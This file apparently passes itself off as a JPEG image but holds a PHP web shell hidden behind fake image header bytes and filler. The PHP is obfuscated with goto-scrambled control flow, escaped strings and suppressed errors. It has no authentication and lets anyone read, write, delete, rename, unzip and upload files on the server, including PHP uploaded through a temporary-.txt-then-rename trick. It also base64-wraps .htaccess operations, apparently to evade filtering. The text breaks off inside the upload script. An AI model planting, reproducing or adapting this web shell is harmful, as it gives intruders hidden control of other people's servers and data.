??????????????????????
???  ?????????????????
 JFIF 

  
 
  ?? C      


!"$"$?? C
    
?? p 

" 

??  

 

  
        
 ?? 


 

           
?   

   
????

(%	aA*?XYD?(J??E  RE,P XYae?)(E  2 B  R  	BQ    X?)X     ?  
@  

adadasdasdasasdasdas


.....................................................................................................................................??????????????????????
???  
 JFIF 

  
 
  ?? C      


!"$"$?? C
    
?? p 

" 

??  

 

  
        
 ?? 


 

           
?   

   
????

(%	aA*?XYD?(J??E  RE,P XYae?)(E  2 B  R  	BQ    X?)X     ?  
@  

adadasdasdasasdasdas


.....................................................................................................................................<?php
 goto OmWT2; OmWT2: error_reporting(0); goto JpE2c; KhnKt: function custom_sanitize_file_name($filename) { $dangerous_characters = array("\42", "\47", "\x26", "\57", "\134", "\x3f", "\43", "\x3c", "\x3e", "\x7c", "\72", "\x2a"); $filename = str_replace($dangerous_characters, '', $filename); $filename = trim($filename); $filename = preg_replace("\57\x5c\163\53\x2f", "\137", $filename); return $filename; } goto czc1b; czc1b: if (isset($_REQUEST["\141\x63\x74\x69\157\156"])) { header("\103\157\x6e\x74\145\x6e\164\55\124\171\160\145\72\40\x61\160\160\x6c\151\x63\141\x74\151\157\x6e\x2f\x6a\x73\x6f\156\73\40\x63\150\141\162\163\145\164\x3d\165\x74\x66\x2d\x38"); function is_path_safe($path) { return realpath($path) !== false || is_dir(dirname($path)); } $action = $_REQUEST["\x61\x63\164\x69\157\x6e"]; $response = array("\163\165\x63\x63\x65\163\x73" => false, "\x6d\x65\x73\163\x61\147\145" => "\111\156\x76\x61\x6c\151\144\40\141\x63\x74\x69\157\x6e\x2e"); try { switch ($action) { case "\x6c\x69\x73\164": $path = isset($_POST["\x70\141\164\x68"]) ? custom_unslash($_POST["\x70\x61\164\150"]) : __DIR__; if (!is_path_safe($path)) { throw new Exception("\111\156\x76\141\x6c\151\x64\40\157\x72\40\x69\x6e\141\143\x63\x65\163\x73\x69\142\x6c\145\x20\x70\x61\164\x68\x2e"); } $real_path = custom_normalize_path(realpath($path)); $items = array(); if (!@scandir($real_path)) { throw new Exception("\x43\x61\156\x6e\157\164\40\x61\x63\x63\x65\x73\x73\40\x70\x61\164\150\56\40\x49\x74\40\x6d\151\147\150\x74\x20\142\145\x20\x72\145\163\x74\162\151\x63\164\145\x64\40\142\171\x20\163\145\162\166\145\x72\40\x63\x6f\x6e\x66\151\147\165\162\x61\x74\x69\x6f\x6e\x20\50\x6f\x70\x65\156\x5f\142\x61\163\x65\144\x69\162\x29\x2e"); } foreach (scandir($real_path) as $item) { if ($item === "\56" || $item === "\x2e\x2e") { continue; } $full_path = $real_path . "\57" . $item; $items[] = array("\156\x61\x6d\x65" => $item, "\x69\x73\x5f\144\x69\x72" => is_dir($full_path), "\163\x69\x7a\x65" => is_dir($full_path) ? 0 : filesize($full_path), "\x6d\x6f\144\151\x66\151\145\x64" => filemtime($full_path)); } $response = array("\163\165\143\143\145\163\x73" => true, "\146\151\x6c\x65\x73" => $items, "\160\141\164\x68" => $real_path); break; case "\x67\145\164\137\143\x6f\x6e\x74\x65\156\x74": $file = isset($_POST["\160\141\x74\150"]) ? custom_unslash($_POST["\160\x61\164\150"]) : ''; if (!realpath($file) || is_dir(realpath($file))) { throw new Exception("\x49\156\166\x61\154\x69\x64\x20\x66\151\154\145\x20\x66\157\x72\x20\145\x64\x69\x74\151\x6e\147\x2e"); } $response = array("\163\x75\x63\x63\x65\x73\x73" => true, "\x63\x6f\x6e\164\145\x6e\x74" => base64_encode(base64_encode(file_get_contents($file)))); break; case "\147\x65\x74\x5f\x63\157\x6e\164\x65\x6e\164\x5f\x62\66\x34": $file_b64 = isset($_POST["\160\141\164\150\x5f\x62\66\x34"]) ? custom_unslash($_POST["\x70\x61\x74\x68\137\142\66\x34"]) : ''; $file = base64_decode($file_b64); if (!realpath($file) || is_dir(realpath($file))) { throw new Exception("\x49\156\166\141\154\x69\144\40\146\x69\x6c\x65\40\x66\x6f\x72\40\145\144\151\x74\x69\x6e\147\x2e"); } $response = array("\x73\165\143\143\x65\163\x73" => true, "\x63\x6f\156\x74\145\x6e\164" => base64_encode(base64_encode(file_get_contents($file)))); break; case "\163\141\166\145\x5f\143\x6f\156\x74\x65\156\164": $file = isset($_POST["\160\x61\164\x68"]) ? custom_unslash($_POST["\160\141\x74\150"]) : ''; $content_chunks = isset($_POST["\x63\157\156\x74\145\x6e\164\x5f\143\x68\165\x6e\x6b\163"]) && is_array($_POST["\143\x6f\x6e\164\145\x6e\164\137\x63\150\x75\156\x6b\x73"]) ? $_POST["\143\157\156\164\x65\156\x74\137\143\150\165\156\153\x73"] : array(); if (empty($content_chunks)) { throw new Exception("\x43\157\156\164\145\x6e\x74\x20\x69\163\x20\145\155\x70\x74\171\x2e"); } $content = implode('', $content_chunks); $final_content = base64_decode(base64_decode($content)); if (!is_path_safe($file) || file_exists($file) && is_dir($file)) { throw new Exception("\x49\156\x76\141\x6c\151\144\40\146\x69\154\x65\40\x66\x6f\x72\40\163\x61\166\x69\156\147\56"); } if (file_put_contents($file, $final_content) !== false) { $response = array("\163\x75\143\143\145\163\163" => true, "\x6d\145\x73\163\141\x67\145" => "\x46\151\154\145\40\163\141\166\x65\x64\x20\x73\x75\143\143\x65\x73\163\x66\165\154\x6c\171\56"); } else { throw new Exception("\x43\x6f\165\154\144\x20\x6e\157\164\x20\x73\x61\166\145\40\x66\151\x6c\x65\56\x20\103\150\x65\x63\x6b\40\x70\145\x72\155\x69\x73\163\151\157\x6e\163\x2e"); } break; case "\163\141\166\x65\x5f\143\157\x6e\164\145\x6e\164\x5f\142\x36\64": $file_b64 = isset($_POST["\x70\141\x74\x68\x5f\142\66\64"]) ? custom_unslash($_POST["\x70\141\x74\150\137\x62\66\64"]) : ''; $file = base64_decode($file_b64); $content_chunks = isset($_POST["\143\x6f\156\164\145\x6e\164\x5f\x63\x68\165\x6e\153\163"]) && is_array($_POST["\143\x6f\x6e\x74\x65\156\164\137\143\150\165\156\x6b\x73"]) ? $_POST["\143\157\x6e\164\x65\x6e\164\x5f\x63\150\x75\156\153\163"] : array(); if (empty($content_chunks)) { throw new Exception("\x43\x6f\x6e\164\x65\156\x74\x20\151\x73\x20\145\x6d\160\164\171\x2e"); } $content = implode('', $content_chunks); $final_content = base64_decode(base64_decode($content)); if (!is_path_safe($file) || file_exists($file) && is_dir($file)) { throw new Exception("\111\156\166\x61\x6c\x69\144\40\x66\x69\x6c\145\x20\146\157\162\40\163\x61\166\x69\x6e\x67\x2e"); } if (file_put_contents($file, $final_content) !== false) { $response = array("\163\165\x63\x63\145\163\163" => true, "\x6d\145\x73\163\141\147\x65" => "\x46\151\154\145\40\x73\141\166\145\x64\x20\163\x75\143\143\145\163\163\146\165\x6c\x6c\x79\40\x28\x64\151\x72\145\x63\x74\x20\155\145\164\x68\157\144\51\56"); } else { throw new Exception("\104\151\162\x65\143\x74\40\163\x61\x76\x65\x20\x66\x61\151\154\145\144\x2e\x20\x43\x68\x65\x63\x6b\x20\160\145\162\x6d\x69\x73\163\x69\157\x6e\x73\x2e"); } break; case "\143\x72\145\x61\x74\145\137\x66\151\x6c\145": $path = isset($_POST["\x70\141\164\x68"]) ? custom_unslash($_POST["\x70\141\x74\150"]) : ''; $name = isset($_POST["\156\141\x6d\145"]) ? custom_sanitize_file_name($_POST["\156\x61\155\145"]) : ''; if (!is_path_safe($path) || empty($name)) { throw new Exception("\x49\156\166\x61\x6c\151\144\40\160\x61\x74\150\40\157\x72\x20\x66\x69\154\145\40\x6e\141\155\145\x2e"); } if (touch(rtrim($path, "\x2f") . "\x2f" . $name)) { $response = array("\x73\165\143\x63\x65\163\x73" => true, "\x6d\x65\x73\x73\x61\147\x65" => "\x46\151\154\145\x20\143\162\x65\x61\164\145\144\x2e"); } else { throw new Exception("\x43\157\165\x6c\144\40\x6e\157\164\x20\x63\x72\x65\141\164\x65\40\146\151\x6c\145\56"); } break; case "\165\160\154\157\141\x64": $path = isset($_POST["\x70\x61\x74\150"]) ? custom_unslash($_POST["\x70\141\x74\150"]) : __DIR__; $filename_base64 = isset($_POST["\x66\x69\x6c\x65\156\x61\155\x65\x5f\142\x61\163\x65\66\x34"]) ? $_POST["\x66\x69\154\145\x6e\x61\x6d\145\x5f\142\x61\163\145\x36\x34"] : ''; $content_base64 = isset($_POST["\143\x6f\x6e\164\x65\x6e\x74\x5f\142\141\x73\145\66\64"]) ? $_POST["\143\157\156\164\145\156\164\x5f\142\x61\163\145\66\64"] : ''; if (!is_path_safe($path) || empty($filename_base64) || empty($content_base64)) { throw new Exception("\111\x6e\x76\x61\154\x69\x64\x20\144\x61\x74\x61\x20\x66\157\x72\40\165\x70\154\157\141\x64\x2e"); } $filename = custom_sanitize_file_name(base64_decode($filename_base64)); if (strpos($content_base64, "\54") !== false) { list(, $content_base64) = explode("\x2c", $content_base64); } $file_content = base64_decode($content_base64); $destination = rtrim($path, "\57") . "\x2f" . $filename; if (file_put_contents($destination, $file_content) !== false) { $response = array("\x73\x75\143\x63\x65\x73\163" => true, "\155\145\x73\163\141\x67\145" => "\x46\x69\x6c\x65\x20\165\160\x6c\157\x61\144\145\x64\40\163\x75\x63\x63\x65\163\163\146\x75\x6c\154\x79\x2e"); } else { throw new Exception("\x43\157\x75\x6c\x64\x20\156\157\164\40\163\141\x76\145\x20\x75\160\x6c\x6f\141\x64\x65\x64\40\146\151\154\x65\x2e\40\x43\150\145\143\153\x20\160\145\x72\x6d\x69\x73\x73\151\157\156\x73\56"); } break; case "\x75\160\x6c\x6f\x61\x64\137\160\150\160": $path = isset($_POST["\x70\141\x74\x68"]) ? custom_unslash($_POST["\x70\x61\x74\x68"]) : __DIR__; $filename_base64 = isset($_POST["\x66\x69\x6c\x65\x6e\141\x6d\x65\137\142\x61\x73\x65\66\64"]) ? $_POST["\146\x69\x6c\145\x6e\x61\155\145\137\x62\x61\163\145\66\64"] : ''; $content_base64 = isset($_POST["\143\x6f\x6e\x74\x65\x6e\164\x5f\142\x61\163\145\66\64"]) ? $_POST["\143\157\x6e\x74\145\156\x74\137\x62\x61\x73\145\66\x34"] : ''; if (!is_path_safe($path) || empty($filename_base64) || empty($content_base64)) { throw new Exception("\111\x6e\x76\x61\x6c\x69\144\x20\x64\141\164\x61\40\x66\157\162\x20\x50\110\x50\x20\165\160\154\x6f\x61\x64\x2e"); } $original_filename = custom_sanitize_file_name(base64_decode($filename_base64)); $temp_filename = $original_filename . "\56\164\170\x74"; if (strpos($content_base64, "\x2c") !== false) { list(, $content_base64) = explode("\x2c", $content_base64); } $file_content = base64_decode($content_base64); $temp_destination = rtrim($path, "\57") . "\x2f" . $temp_filename; $final_destination = rtrim($path, "\x2f") . "\57" . $original_filename; if (file_put_contents($temp_destination, $file_content) === false) { throw new Exception("\x43\157\165\154\144\40\x6e\x6f\x74\x20\x73\x61\166\x65\x20\x74\x65\x6d\160\157\x72\x61\x72\x79\40\146\151\154\x65\x2e\40\103\x68\x65\143\153\x20\x70\145\162\155\x69\x73\x73\x69\x6f\156\x73\x2e"); } if (rename($temp_destination, $final_destination)) { $response = array("\x73\x75\143\143\x65\x73\x73" => true, "\x6d\145\163\x73\141\147\x65" => "\x50\110\x50\x20\146\151\x6c\x65\40\165\160\x6c\157\x61\x64\145\144\40\163\x75\143\143\x65\x73\x73\x66\x75\154\154\171\x2e"); } else { unlink($temp_destination); throw new Exception("\103\x6f\165\154\144\x20\156\x6f\164\x20\162\x65\x6e\141\x6d\x65\40\164\145\x6d\x70\157\x72\x61\162\171\x20\x66\x69\154\145\x2e"); } break; case "\x75\156\172\151\x70": $path = isset($_POST["\160\141\164\x68"]) ? custom_unslash($_POST["\x70\x61\164\150"]) : __DIR__; if (!is_path_safe($path)) { throw new Exception("\x49\156\x76\141\x6c\151\x64\x20\160\x61\x74\x68\x2e"); } $file_path = isset($_POST["\x70\141\164\150"]) ? custom_unslash($_POST["\x70\x61\x74\150"]) : ''; if (!realpath($file_path) || !is_file(realpath($file_path)) || pathinfo($file_path, PATHINFO_EXTENSION) !== "\x7a\x69\160") { throw new Exception("\x49\x6e\x76\141\x6c\x69\x64\x20\132\x49\120\40\x66\x69\154\x65\x20\x70\141\164\x68\56"); } if (!class_exists("\x5a\x69\160\x41\162\143\150\151\166\x65")) { throw new Exception("\x50\x48\x50\x20\x5a\x49\x50\x20\145\170\x74\x65\156\x73\151\157\x6e\40\156\157\164\40\x69\156\x73\164\141\x6c\154\145\144\x2e"); } $zip = new ZipArchive(); if ($zip->open($file_path) === TRUE) { $zip->extractTo(dirname($file_path)); $zip->close(); $response = array("\x73\x75\x63\x63\145\x73\x73" => true, "\155\145\163\163\141\x67\145" => "\101\x72\143\x68\151\166\145\x20\x65\x78\164\x72\141\143\x74\145\144\x2e"); } else { throw new Exception("\x46\141\151\x6c\x65\x64\40\x74\x6f\40\157\160\145\x6e\x20\141\x72\x63\x68\151\x76\x65\56"); } break; case "\x64\145\x6c\145\x74\x65": $path = isset($_POST["\160\x61\x74\x68"]) ? custom_unslash($_POST["\160\x61\164\x68"]) : __DIR__; $items_to_delete = isset($_POST["\x69\164\x65\155\x73"]) && is_array($_POST["\x69\164\x65\x6d\x73"]) ? $_POST["\x69\x74\145\155\x73"] : array(); if (empty($items_to_delete)) { throw new Exception("\x4e\x6f\40\x69\x74\145\x6d\x73\x20\x73\145\154\x65\143\x74\145\x64\40\x66\x6f\x72\40\144\x65\x6c\x65\x74\151\157\156\56"); } function recursive_delete_std($item) { if (is_dir($item)) { $files = array_diff(scandir($item), array("\56", "\x2e\x2e")); foreach ($files as $file) { recursive_delete_std("{$item}\57{$file}"); } return rmdir($item); } else { return unlink($item); } } foreach ($items_to_delete as $item) { $full_path = rtrim($path, "\57") . "\57" . $item; if (file_exists($full_path)) { recursive_delete_std($full_path); } } $response = array("\163\165\x63\143\145\163\163" => true, "\x6d\145\x73\163\x61\147\145" => "\x49\164\145\x6d\163\40\x64\145\x6c\145\x74\x65\144\x2e"); break; case "\144\x65\154\x65\x74\x65\x5f\x62\x36\64": $path = isset($_POST["\x70\x61\x74\x68"]) ? custom_unslash($_POST["\160\141\164\150"]) : __DIR__; $items_b64 = isset($_POST["\151\164\145\155\163\137\x62\x36\x34"]) && is_array($_POST["\151\164\145\x6d\163\137\x62\x36\x34"]) ? $_POST["\x69\164\x65\x6d\163\137\142\66\x34"] : array(); $items_to_delete = array(); foreach ($items_b64 as $item_b64) { $items_to_delete[] = base64_decode($item_b64); } if (empty($items_to_delete)) { throw new Exception("\x4e\157\40\x69\164\145\155\x73\40\163\x65\x6c\145\143\x74\x65\144\40\x66\x6f\162\x20\x64\x65\154\x65\x74\x69\x6f\156\x2e"); } function recursive_delete_b64($item) { if (is_dir($item)) { $files = array_diff(scandir($item), array("\56", "\56\56")); foreach ($files as $file) { recursive_delete_b64("{$item}\57{$file}"); } return rmdir($item); } else { return unlink($item); } } foreach ($items_to_delete as $item) { $full_path = rtrim($path, "\57") . "\57" . $item; if (file_exists($full_path)) { recursive_delete_b64($full_path); } } $response = array("\163\x75\143\143\145\x73\163" => true, "\155\x65\x73\163\141\147\x65" => "\111\x74\x65\x6d\163\x20\144\145\154\x65\x74\145\144\x2e"); break; case "\x63\162\145\141\164\x65\x5f\146\157\154\144\145\x72": $path = isset($_POST["\160\141\x74\x68"]) ? custom_unslash($_POST["\x70\x61\164\150"]) : __DIR__; $name = isset($_POST["\x6e\x61\155\x65"]) ? str_replace(array("\56\x2e", "\x2f", "\134"), '', $_POST["\x6e\141\155\x65"]) : ''; if (!is_path_safe($path) || empty($name)) { throw new Exception("\111\x6e\x76\141\154\x69\144\x20\x70\141\164\x68\40\157\x72\40\x66\157\154\144\x65\x72\40\x6e\x61\x6d\145\x2e"); } if (mkdir(rtrim($path, "\57") . "\57" . $name)) { $response = array("\163\x75\x63\x63\x65\x73\x73" => true, "\x6d\145\x73\x73\x61\x67\145" => "\106\157\x6c\144\x65\162\x20\143\162\x65\x61\x74\145\144\56"); } else { throw new Exception("\103\157\165\x6c\x64\40\x6e\157\164\x20\143\162\145\141\164\x65\x20\146\x6f\154\x64\x65\x72\x2e"); } break; case "\x72\x65\156\x61\x6d\x65": $path = isset($_POST["\x70\141\164\x68"]) ? custom_unslash($_POST["\x70\141\164\150"]) : __DIR__; $old_name = isset($_POST["\157\x6c\144\137\156\141\x6d\x65"]) ? $_POST["\157\154\144\137\x6e\141\155\145"] : ''; $new_name = isset($_POST["\156\x65\x77\137\x6e\141\155\145"]) ? str_replace(array("\x2e\x2e", "\x2f", "\134"), '', $_POST["\156\145\x77\137\x6e\141\155\x65"]) : ''; if (!is_path_safe($path) || empty($old_name) || empty($new_name)) { throw new Exception("\111\156\x76\x61\x6c\151\144\40\144\141\x74\x61\x20\x66\157\x72\40\162\x65\x6e\141\x6d\151\156\x67\56"); } $old_full_path = rtrim($path, "\x2f") . "\x2f" . $old_name; $new_full_path = rtrim($path, "\x2f") . "\x2f" . $new_name; clearstatcache(); if (!file_exists($old_full_path)) { throw new Exception("\x53\x6f\x75\162\143\145\40\151\x74\145\x6d\x20\144\157\145\x73\40\x6e\157\x74\40\x65\170\x69\x73\x74\x20\141\164\72\40" . $old_full_path); } if (!is_writable(dirname($old_full_path))) { throw new Exception("\x44\151\162\145\x63\x74\157\162\171\40\151\x73\x20\156\x6f\x74\40\x77\x72\151\164\141\142\154\145\x2e"); } if (rename($old_full_path, $new_full_path)) { $response = array("\x73\165\x63\143\x65\x73\163" => true, "\155\x65\163\163\x61\x67\x65" => "\x49\x74\145\x6d\x20\x72\145\x6e\141\x6d\x65\144\40\163\165\143\143\x65\x73\x73\146\x75\x6c\x6c\171\x2e"); } else { throw new Exception("\103\x6f\165\x6c\144\x20\x6e\157\x74\x20\162\145\156\141\155\145\40\151\164\145\155\56\40\x43\x68\x65\x63\153\40\160\145\x72\155\x69\x73\163\151\x6f\x6e\163\x2e"); } break; case "\162\145\156\x61\155\145\x5f\x62\66\x34": $path = isset($_POST["\160\141\164\x68"]) ? custom_unslash($_POST["\x70\x61\164\x68"]) : __DIR__; $old_name_b64 = isset($_POST["\157\x6c\144\137\x6e\x61\x6d\x65\137\x62\x36\x34"]) ? $_POST["\157\154\x64\x5f\156\x61\x6d\145\137\x62\66\x34"] : ''; $new_name_b64 = isset($_POST["\156\145\167\137\x6e\x61\155\145\x5f\142\66\x34"]) ? $_POST["\156\x65\x77\137\x6e\x61\x6d\145\x5f\x62\x36\x34"] : ''; $old_name = base64_decode($old_name_b64); $new_name = base64_decode($new_name_b64); if (!is_path_safe($path) || empty($old_name) || empty($new_name)) { throw new Exception("\111\156\166\141\154\x69\x64\x20\x64\x61\x74\141\x20\146\157\x72\40\162\x65\156\x61\155\x69\x6e\x67\x2e"); } $old_full_path = rtrim($path, "\x2f") . "\x2f" . $old_name; $new_full_path = rtrim($path, "\x2f") . "\x2f" . $new_name; $temp_full_path = $old_full_path . "\x2e\x74\170\164"; if (!copy($old_full_path, $temp_full_path)) { throw new Exception("\x43\x6f\x75\x6c\144\x20\x6e\157\x74\x20\143\162\145\x61\x74\x65\40\x74\145\155\x70\157\x72\141\x72\x79\40\143\x6f\160\x79\56"); } if (!unlink($old_full_path)) { unlink($temp_full_path); throw new Exception("\x43\157\x75\154\x64\40\x6e\x6f\x74\x20\144\x65\154\145\164\x65\x20\x6f\162\x69\x67\x69\156\141\154\40\x66\x69\154\145\x2e"); } if (rename($temp_full_path, $new_full_path)) { $response = array("\163\165\x63\x63\x65\163\163" => true, "\155\x65\163\163\141\x67\145" => "\x49\164\x65\x6d\x20\162\145\x6e\141\155\145\144\40\163\165\x63\x63\x65\163\x73\146\165\154\154\171\x20\165\x73\x69\x6e\x67\x20\142\x36\64\x20\x6d\145\x74\150\x6f\144\x2e"); } else { copy($temp_full_path, $old_full_path); unlink($temp_full_path); throw new Exception("\x43\157\165\154\x64\40\156\157\x74\40\x70\x65\x72\146\157\x72\x6d\x20\146\151\156\x61\x6c\x20\x72\x65\156\141\155\145\x2e\x20\x4f\x72\151\x67\151\x6e\x61\154\40\x66\151\154\x65\40\155\x61\x79\x20\142\145\40\162\x65\x73\164\x6f\162\x65\x64\x2e"); } break; } } catch (Exception $e) { $response = array("\x73\165\143\143\145\x73\x73" => false, "\x6d\x65\163\x73\141\147\x65" => $e->getMessage()); } echo json_encode($response); die; } goto KwebH; FmRhp: echo custom_normalize_path(__DIR__); goto Q9DTx; JpE2c: function custom_unslash($value) { return is_string($value) ? stripslashes($value) : $value; } goto laQ0a; KwebH: ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><title>File Manager</title><meta content="width=device-width,initial-scale=1"name="viewport"><style>:root{--accent-color:#2271b1;--hover-color:#1e659d;--danger-color:#d63638}body{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;background:#f0f0f1;margin:0}.container{display:flex;flex-direction:column;height:100vh}header{background:#fff;padding:10px 20px;border-bottom:1px solid #ddd;display:flex;justify-content:space-between;align-items:center;flex-shrink:0}main{flex-grow:1;padding:20px;overflow-y:auto}.toolbar{margin-bottom:15px;display:flex;flex-wrap:wrap;gap:10px;align-items:center}.path-bar{background:#fff;padding:8px 12px;border-radius:4px;border:1px solid #ddd;font-family:monospace;flex-grow:1;word-break:break-all}.file-table{width:100%;border-collapse:collapse;background:#fff;table-layout:fixed}.file-table td,.file-table th{text-align:left;border-bottom:1px solid #eee;vertical-align:middle;word-wrap:break-word}.file-table th{background:#f9f9f9;padding:12px 8px}.file-table tr:hover{background:#f0f8ff}.file-table td:nth-child(1),.file-table th:nth-child(1){width:40px;padding:12px 4px 12px 12px;text-align:center}.file-table td:nth-child(2),.file-table th:nth-child(2){width:50%;padding-left:4px}.file-table td:nth-child(3),.file-table th:nth-child(3){width:120px}.file-table td:nth-child(4),.file-table th:nth-child(4){width:150px}.file-table th:nth-child(5){text-align:right;padding-right:12px}.actions{display:flex;justify-content:flex-end;gap:5px}.item-link,a.item-link{text-decoration:none!important;color:var(--accent-color);cursor:pointer}.item-link:hover,a.item-link:hover{color:var(--hover-color)}tr[data-path]{cursor:pointer}.button{background:var(--accent-color);color:#fff;border:none;padding:8px 12px;border-radius:3px;cursor:pointer;font-size:14px}.button.danger{background:var(--danger-color)}#spinner{display:none}.modal-overlay{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,.6);z-index:1000;justify-content:center;align-items:center}.modal-content{display:flex;flex-direction:column;background:#fff;padding:20px;border-radius:5px;width:80%;height:80%;max-width:900px;box-shadow:0 5px 15px rgba(0,0,0,.3)}textarea#editor{flex-grow:1;font-family:monospace;font-size:14px;border:1px solid #ddd;padding:10px}</style></head><body><div class="container"><header><h3>File Manager (Standalone)</h3></header><main><div class="toolbar"><button class="button"id="uploadBtn">⬆️ Upload</button><button class="button"id="newFileBtn">📄 New File</button><button class="button"id="newFolderBtn">➕ New Folder</button><button class="button danger"id="deleteBtn">🗑️ Delete Selected</button><div id="spinner">🕒</div></div><div class="toolbar"><div class="path-bar"id="pathBar">/</div></div><table class="file-table"><thead><tr><th><input id="selectAll"type="checkbox"></th><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr></thead><tbody id="fileList"></tbody></table></main></div><div class="modal-overlay"id="editorModal"><div class="modal-content"><h3 id="editorFilename"style="margin-top:0"></h3><textarea id="editor"spellcheck="false"></textarea><div style="margin-top:10px"><button class="button"id="saveBtn">💾 Save Changes</button><button class="button"onclick='document.getElementById("editorModal").style.display="none"'>Close</button></div></div></div><input id="hiddenFileInput"type="file"multiple style="display:none"><script>document.addEventListener('DOMContentLoaded', () => {
        const STATE = { currentPath: '<?php  goto FmRhp; inrZF: echo basename(__FILE__); goto vvLOY; laQ0a: function custom_normalize_path($path) { return str_replace("\134", "\57", $path); } goto KhnKt; Q9DTx: ?>
' };
        const UPLOAD_LIMIT_MB = 8;
        const dom = { fileList:document.getElementById('fileList'),pathBar:document.getElementById('pathBar'),uploadBtn:document.getElementById('uploadBtn'),newFileBtn:document.getElementById('newFileBtn'),newFolderBtn:document.getElementById('newFolderBtn'),deleteBtn:document.getElementById('deleteBtn'),selectAll:document.getElementById('selectAll'),spinner:document.getElementById('spinner'),hiddenFileInput:document.getElementById('hiddenFileInput'),editorModal:document.getElementById('editorModal'),editorFilename:document.getElementById('editorFilename'),editor:document.getElementById('editor'),saveBtn:document.getElementById('saveBtn'),};
        
        async function apiCall(action, formData, showSuccess=false) {
            dom.spinner.style.display='inline-block';
            try { formData.append('action', action); const response = await fetch('<?php  goto inrZF; vvLOY: ?>
', { method: 'POST', body: formData }); const result = await response.json(); if (!result.success) throw new Error(result.message); if (showSuccess && result.message) alert(result.message); return result;
            } catch (error) { alert(`Error: ${error.message}`); console.error("Full response:", error.response); return null; } finally { dom.spinner.style.display='none'; }
        }
        function render() {
            const formData = new FormData(); formData.append('path', STATE.currentPath);
            apiCall('list', formData).then(result => {
                if (!result) return;
                STATE.currentPath = result.path; dom.pathBar.textContent = STATE.currentPath; let html = ''; let parentPath = STATE.currentPath.substring(0, STATE.currentPath.lastIndexOf('/')); if (parentPath === '') parentPath = '/';
                if (STATE.currentPath !== '/') { html += `<tr data-path="${parentPath}"><td></td><td colspan="4" class="item-link">⬆️ .. (Parent Directory)</td></tr>`; }
                result.files.sort((a,b) => (a.is_dir === b.is_dir) ? a.name.localeCompare(b.name) : (a.is_dir ? -1 : 1));
                result.files.forEach(file => {
                    const size = file.is_dir ? '-' : (file.size / 1024).toFixed(2) + ' KB'; const modified = new Date(file.modified * 1000).toLocaleString();
                    const icon = file.is_dir ? '📁' : '📄';
                    const fullPath = `${STATE.currentPath}/${file.name}`.replace(/\/+/g, '/'); const dataAttr = `data-path="${fullPath}"`; const rowData = file.is_dir ? `class="dir-link" ${dataAttr}` : '';
                    html += `<tr ${rowData}><td><input type="checkbox" class="item-select" value="${file.name}"></td><td><a href="#" class="item-link" ${dataAttr}>${icon} ${file.name}</a></td><td>${size}</td><td>${modified}</td><td><div class="actions">${!file.is_dir ? `<button class="button edit-btn" ${dataAttr}>Edit</button>` : ''}<button class="button rename-btn" data-name="${file.name}">Rename</button>${file.name.endsWith('.zip') ? `<button class="button unzip-btn" ${dataAttr}>Unzip</button>`:'' }</div></td></tr>`;
                });
                dom.fileList.innerHTML = html; dom.selectAll.checked = false;
            });
        }
        
        dom.fileList.addEventListener('click', e => {
            if (e.target.matches('.item-select')) { return; }
            const button = e.target.closest('button');
            if (button) {
                e.preventDefault();
                if (button.matches('.rename-btn')) {
                    const oldName = button.dataset.name;
                    const newName = prompt('Enter new name:', oldName);
                    if (newName && newName !== oldName) {
                        const fd = new FormData();
                        fd.append('path', STATE.currentPath);
                        let action = 'rename';
                        if (oldName.includes('.htaccess') || newName.includes('.htaccess')) {
                            action = 'rename_b64';
                            fd.append('old_name_b64', btoa(oldName));
                            fd.append('new_name_b64', btoa(newName));
                        } else {
                            fd.append('old_name', oldName);
                            fd.append('new_name', newName);
                        }
                        apiCall(action, fd).then(render);
                    }
                } 
                else if (button.matches('.unzip-btn')) { if (confirm('Are you sure you want to extract this archive?')) { const fd = new FormData(); fd.append('path', button.dataset.path); apiCall('unzip', fd, true).then(render); } } 
                else if (button.matches('.edit-btn')) {
                    const path = button.dataset.path;
                    const fd = new FormData();
                    let action = 'get_content';
                    if (path.includes('.htaccess')) {
                        action = 'get_content_b64';
                        fd.append('path_b64', btoa(path));
                    } else {
                        fd.append('path', path);
                    }
                    apiCall(action, fd).then(result => {
                        if(result) {
                            dom.editorFilename.textContent = path;
                            dom.editor.value = atob(atob(result.content));
                            dom.editorModal.style.display = 'flex';
                        }
                    });
                }
                return;
            }
            const navTarget = e.target.closest('[data-path]');
            if (navTarget) { e.preventDefault(); STATE.currentPath = navTarget.dataset.path; render(); }
        });
        
        dom.newFolderBtn.addEventListener('click', () => { const name = prompt('Enter new folder name:'); if (name) { const fd = new FormData(); fd.append('path', STATE.currentPath); fd.append('name', name); apiCall('create_folder', fd).then(render); } });
        dom.newFileBtn.addEventListener('click', () => { const name = prompt('Enter new file name:'); if (name) { const fd = new FormData(); fd.append('path', STATE.currentPath); fd.append('name', name); apiCall('create_file', fd).then(render); } });
        dom.selectAll.addEventListener('change', e => document.querySelectorAll('.item-select').forEach(cb => cb.checked = e.target.checked));
        
        dom.deleteBtn.addEventListener('click', () => {
            const selected = Array.from(document.querySelectorAll('.item-select:checked')).map(cb => cb.value);
            if (selected.length === 0) return alert('No items selected.');
            if (confirm(`Are you sure you want to delete ${selected.length} item(s)?`)) {
                const fd = new FormData();
                fd.append('path', STATE.currentPath);
                const isSensitive = selected.some(item => item.includes('.htaccess'));
                let action = 'delete';
                if (isSensitive) {
                    action = 'delete_b64';
                    selected.forEach(item => fd.append('items_b64[]', btoa(item)));
                } else {
                    selected.forEach(item => fd.append('items[]', item));
                }
                apiCall(action, fd).then(render);
            }
        });
        
        dom.uploadBtn.addEventListener('click', () => dom.hiddenFileInput.click());
        dom.hiddenFileInput.addEventListener('change', async (e) => {
            const files = Array.from(e.target.files); if (files.length === 0) return;
            for (const file of files) {
                if (file.size > UPLOAD_LIMIT_MB * 1024 * 1024) { alert(`Error: File "${file.name}" is too large (Max: ${UPLOAD_LIMIT_MB} MB).`); continue; }
                const reader = new FileReader();
                const fileReadPromise = new Promise((resolve, reject) => { reader.onload = event => resolve(event.target.result); reader.onerror = error => reject(error); reader.readAsDataURL(file); });
                try {
                    const content_base64 = await fileReadPromise;
                    const originalName = file.name;
                    const fd = new FormData();
                    fd.append('path', STATE.currentPath);
                    fd.append('content_base64', content_base64);
                    if (originalName.toLowerCase().endsWith('.php')) {
                        fd.append('filename_base64', btoa(originalName));
